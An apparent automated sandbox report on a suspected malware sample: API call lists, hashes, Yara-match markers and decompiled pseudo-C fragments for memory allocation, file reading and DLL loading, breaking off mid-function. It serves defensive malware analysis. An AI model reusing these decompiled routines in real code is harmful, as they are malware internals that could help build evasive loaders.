                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 00C106C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                              • Opcode ID: cdb7d25bb6518794affaf5a40d486c8dbd33676f9be182c36b79e5b30ce1be5c
                                                                                                                                                                                                              • Instruction ID: 7818ff1bddbc373cdf787d6cda839264d4b5e357d646c9d3dcf08a006f60c3f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdb7d25bb6518794affaf5a40d486c8dbd33676f9be182c36b79e5b30ce1be5c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EE01A75804204AFCB219F61D80879EBBF1AF8C310F208015FD59A7350DBB895518F50
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00BDE01E
                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00BDE037
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                                                              • Opcode ID: f7c01e013c1d42f239b196e3899d58fc8ab3f5a4e987f23c069d2f2640a4a7d6
                                                                                                                                                                                                              • Instruction ID: bf795ef53405ed50dde3a24f4809d17c145f63344435d763d359cf43771992da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7c01e013c1d42f239b196e3899d58fc8ab3f5a4e987f23c069d2f2640a4a7d6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62514A714087449BE320AF54E886BAFF7F8FF84714F51489DF1D841191EB709969CB16
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _vswprintf_s
                                                                                                                                                                                                              • String ID: 0-}$0-}
                                                                                                                                                                                                              • API String ID: 677850445-4073034053
                                                                                                                                                                                                              • Opcode ID: 17083c636c0bd772b187b5b0758cf14c95e182ad4561d79bdfd7c3c640584529
                                                                                                                                                                                                              • Instruction ID: 4232b8365785d184155c2c6c2100f7de69f9203f3d6a7fdd52b1f3d836971c64
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17083c636c0bd772b187b5b0758cf14c95e182ad4561d79bdfd7c3c640584529
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84418E7591020AEBCF14CF59C881AEEB7B9EF48300F19886AE811EB250E774DB55DF94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00C58186
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C5819B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                              • String ID: '
                                                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                                                              • Opcode ID: 5893b0974f102a9737afc900d7deff6c696431cf243290ff7cc05a7b6d38c915
                                                                                                                                                                                                              • Instruction ID: eac98493dcbd9084acf1248890b9c5865b8aa70920d39d6c0bcf8a23072ce30f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5893b0974f102a9737afc900d7deff6c696431cf243290ff7cc05a7b6d38c915
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC412A78A016099FDB10CF65C885BDE7BB5FB08301F10016AED14EB391DB70A98ACF94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __snwprintf.LIBCMT ref: 00C44132
                                                                                                                                                                                                                • Part of subcall function 00BE1A36: _memmove.LIBCMT ref: 00BE1A77
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __snwprintf_memmove
                                                                                                                                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                              • API String ID: 3506404897-2584243854
                                                                                                                                                                                                              • Opcode ID: 9ccf271ca150bbb26dbe49b18773392d71d327a5ecb1d3add534f2dc49193ad0
                                                                                                                                                                                                              • Instruction ID: 11e6994d841d4b9575dc66b4e24a797ad042bb7f793e2e0102066a9b73a3e3c7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ccf271ca150bbb26dbe49b18773392d71d327a5ecb1d3add534f2dc49193ad0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F219331A0021DABCF14EF65CC91FAE77B9FF54340F6004A5F915A7242DB30AA45DBA1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $#$PE$x
                                                                                                                                                                                                              • API String ID: 0-11863757
                                                                                                                                                                                                              • Opcode ID: 96cb60983857a5c96a7e4a22460a499a81623763d56042b3735380302bdb8ba3
                                                                                                                                                                                                              • Instruction ID: cbd7857148e364dd20a783125ceffd7fc2c2d5daaf704d0bc80c2688f0f5fc0e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96cb60983857a5c96a7e4a22460a499a81623763d56042b3735380302bdb8ba3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9D17D769012699AEF70CF54CC48BE9B3B4AF09702F0681DAE948EB150E7708BD0DF95
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C428F8
                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C42921
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                                                              • Opcode ID: 3f79da81e7287ee730e1aa3b808b713ba442d9827a22f87034fb143b472f4bbe
                                                                                                                                                                                                              • Instruction ID: 61d494a45aa55a2444e953f97cac005687013bdfadd5c9e905b438f2248afa7b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f79da81e7287ee730e1aa3b808b713ba442d9827a22f87034fb143b472f4bbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C11E071501225BAEB248F528C8AFBBFFACFF15360F50812AF51596080E3B06990D6F0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00C486E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C4849D,?,00000000,?,?), ref: 00C486F7
                                                                                                                                                                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C484A0
                                                                                                                                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 00C484DD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                                                                                                                                              • String ID: 255.255.255.255
                                                                                                                                                                                                              • API String ID: 2496851823-2422070025
                                                                                                                                                                                                              • Opcode ID: a60d7a1281a2a446f7b0206217e8c42fff7e96926df9b8507863e0af015b497e
                                                                                                                                                                                                              • Instruction ID: 3f66320f8b2a8086c7ec015b5d9a0e4f23189bbaafe2c60475d85b2d643b656e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a60d7a1281a2a446f7b0206217e8c42fff7e96926df9b8507863e0af015b497e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0110831100216ABCB20EF64DC52FFEB364FF00310F208556F925A72D1DB71A814D765
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MessageBoxW.USER32 ref: 00C288A0
                                                                                                                                                                                                                • Part of subcall function 00BF3588: _doexit.LIBCMT ref: 00BF3592
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message_doexit
                                                                                                                                                                                                              • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                              • API String ID: 1993061046-4017498283
                                                                                                                                                                                                              • Opcode ID: 5808aa5bd618c9485a2accd10eaf1c11752260796a7a7fae0275d8d2bc508a36
                                                                                                                                                                                                              • Instruction ID: b457c946490e2253a9139957bacda8278674ad7168466152aca9c489f2dd1373
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5808aa5bd618c9485a2accd10eaf1c11752260796a7a7fae0275d8d2bc508a36
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9D05B3238535C32D22532A96C0BFDE7AC88B45B51F10447AFB08765D38ED5C99442D5
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00C10091
                                                                                                                                                                                                                • Part of subcall function 00C4C6D9: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C4C6E7
                                                                                                                                                                                                                • Part of subcall function 00C4C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00C1027A,?), ref: 00C4C6F9
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00C10289
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000002.2170011324.0000000000BD1000.00000020.00020000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170000406.0000000000BD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170091551.0000000000C60000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170116202.0000000000C86000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170136615.0000000000C90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000002.2170165970.0000000000C99000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                                                                                                                                              • String ID: WIN_XPe
                                                                                                                                                                                                              • API String ID: 582185067-3257408948
                                                                                                                                                                                                              • Opcode ID: de85d81e435bf7546b34f3a0c119ee680edaefe38a9d6e8b36d9f11bc206fe89
                                                                                                                                                                                                              • Instruction ID: a77a8aa2530bf0a0cc07df10f8cce437d8779af4c2ea6ab5c30ba96faefc88b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: de85d81e435bf7546b34f3a0c119ee680edaefe38a9d6e8b36d9f11bc206fe89
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01F0A571845509DFCB65DBA1C999BEDBBB8AB09300F240486E14AB21A0DBB14FC4EF21
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000005.00000003.2166933112.0000000003C00000.00000004.00000001.sdmp, Offset: 03C00000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000005.00000003.2165074899.0000000003CDA000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000005.00000003.2166177808.0000000003CDD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: ,}}$H}}$d}}$|}
                                                                                                                                                                                                              • API String ID: 0-1805031141
                                                                                                                                                                                                              • Opcode ID: 18757e2c54f92e3f5e57ac6ae78d24db8796860b5fb04db895b1b87bbec6a558
                                                                                                                                                                                                              • Instruction ID: e0a2120dc650fa3d65ac84c9b005f83152ad1b7b1aca87c5ce095fc9a8643bf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18757e2c54f92e3f5e57ac6ae78d24db8796860b5fb04db895b1b87bbec6a558
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F51F5B5C00319DEDB25DFA5D881AEEBBB4FF09340F1084AED55AA7240EB305A88DF55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: !:A$b=A$b=A
                                                                                                                                                                                                              • API String ID: 2738559852-704622139
                                                                                                                                                                                                              • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                              • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID: !:A$b=A$b=A
                                                                                                                                                                                                              • API String ID: 2738559852-704622139
                                                                                                                                                                                                              • Opcode ID: f35aa3aa60e04658396aa17d8e9390051b0a1374a1b8b40f6b85dacad4a6e9a5
                                                                                                                                                                                                              • Instruction ID: 45440037e30f2e0df0121e97a6ba5cdaa04a7005028a4be41c2047e34b936827
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f35aa3aa60e04658396aa17d8e9390051b0a1374a1b8b40f6b85dacad4a6e9a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4DF0D4B6200148ABCB08DF99D890CEB77ADAF8C254B15878DFE5C97201C634E8558BA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                                                                              			E004183AB(void* __eax, long _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				void* __ebp;
                                                                                                                                                                                                              				signed char _t20;
                                                                                                                                                                                                              				void* _t24;
                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                              				intOrPtr* _t31;
                                                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t20 = _t34 & 0x0000007e;
                                                                                                                                                                                                              				if(_t20 >= 0) {
                                                                                                                                                                                                              					_t31 = _t20 + 0xc5c;
                                                                                                                                                                                                              					E00418DD0(_t20, _t31,  *((intOrPtr*)(_t20 + 0x10)), 0, 0x2f);
                                                                                                                                                                                                              					_t24 =  *((intOrPtr*)( *_t31))(_a12, _a16, _a20, _a24, _a28, _t30); // executed
                                                                                                                                                                                                              					return _t24;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					__ebp = __esp;
                                                                                                                                                                                                              					__eax = _a4;
                                                                                                                                                                                                              					_t11 = __eax + 0xc60; // 0xca0
                                                                                                                                                                                                              					__esi = _t11;
                                                                                                                                                                                                              					E00418DD0(_a4, _t11,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30) = _a24;
                                                                                                                                                                                                              					__eax = _a12;
                                                                                                                                                                                                              					__eax = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                                              					__esi = __esi;
                                                                                                                                                                                                              					__ebp = __ebp;
                                                                                                                                                                                                              					return __eax;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}










                                                                                                                                                                                                              0x004183ac
                                                                                                                                                                                                              0x004183ae
                                                                                                                                                                                                              0x0041837f
                                                                                                                                                                                                              0x00418387
                                                                                                                                                                                                              0x004183a5
                                                                                                                                                                                                              0x004183a9
                                                                                                                                                                                                              0x004183b0
                                                                                                                                                                                                              0x004183b1
                                                                                                                                                                                                              0x004183b3
                                                                                                                                                                                                              0x004183bf
                                                                                                                                                                                                              0x004183bf
                                                                                                                                                                                                              0x004183cf
                                                                                                                                                                                                              0x004183dd
                                                                                                                                                                                                              0x004183e9
                                                                                                                                                                                                              0x004183eb
                                                                                                                                                                                                              0x004183ec
                                                                                                                                                                                                              0x004183ed
                                                                                                                                                                                                              0x004183ed

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2167126740-0
                                                                                                                                                                                                              • Opcode ID: be6fbd1fca4a060520c75fde4f85e9c0664845cb03531bb4f2406e5f7cd6085b
                                                                                                                                                                                                              • Instruction ID: a19e928069ab2486a285f368f33acd3c5398322f4c4d486ac74851184fcfde79
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be6fbd1fca4a060520c75fde4f85e9c0664845cb03531bb4f2406e5f7cd6085b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 681139B6200208AFCB18DF89DC85EEB77ADEF88754F10855DBA1897281C630F811CBA4
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00409B30(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				char* _v8;
                                                                                                                                                                                                              				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                                                                              				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                                                                              				char _v536;
                                                                                                                                                                                                              				void* _t15;
                                                                                                                                                                                                              				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                                                                              				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_v8 =  &_v536;
                                                                                                                                                                                                              				_t15 = E0041AB60( &_v12, 0x104, _a8);
                                                                                                                                                                                                              				_t31 = _t30 + 0xc;
                                                                                                                                                                                                              				if(_t15 != 0) {
                                                                                                                                                                                                              					_t17 = E0041AF80(__eflags, _v8);
                                                                                                                                                                                                              					_t32 = _t31 + 4;
                                                                                                                                                                                                              					__eflags = _t17;
                                                                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                                                                              						E0041B200( &_v12, 0);
                                                                                                                                                                                                              						_t32 = _t32 + 8;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t18 = E00419310(_v8);
                                                                                                                                                                                                              					_v16 = _t18;
                                                                                                                                                                                                              					__eflags = _t18;
                                                                                                                                                                                                              					if(_t18 == 0) {
                                                                                                                                                                                                              						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                                                                              						return _v16;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					return _t18;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					return _t15;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}













                                                                                                                                                                                                              0x00409b4c
                                                                                                                                                                                                              0x00409b4f
                                                                                                                                                                                                              0x00409b54
                                                                                                                                                                                                              0x00409b59
                                                                                                                                                                                                              0x00409b63
                                                                                                                                                                                                              0x00409b68
                                                                                                                                                                                                              0x00409b6b
                                                                                                                                                                                                              0x00409b6d
                                                                                                                                                                                                              0x00409b75
                                                                                                                                                                                                              0x00409b7a
                                                                                                                                                                                                              0x00409b7a
                                                                                                                                                                                                              0x00409b81
                                                                                                                                                                                                              0x00409b89
                                                                                                                                                                                                              0x00409b8c
                                                                                                                                                                                                              0x00409b8e
                                                                                                                                                                                                              0x00409ba2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00409ba4
                                                                                                                                                                                                              0x00409baa
                                                                                                                                                                                                              0x00409b5e
                                                                                                                                                                                                              0x00409b5e
                                                                                                                                                                                                              0x00409b5e

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Load
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                                                                                              • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                              • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                                              
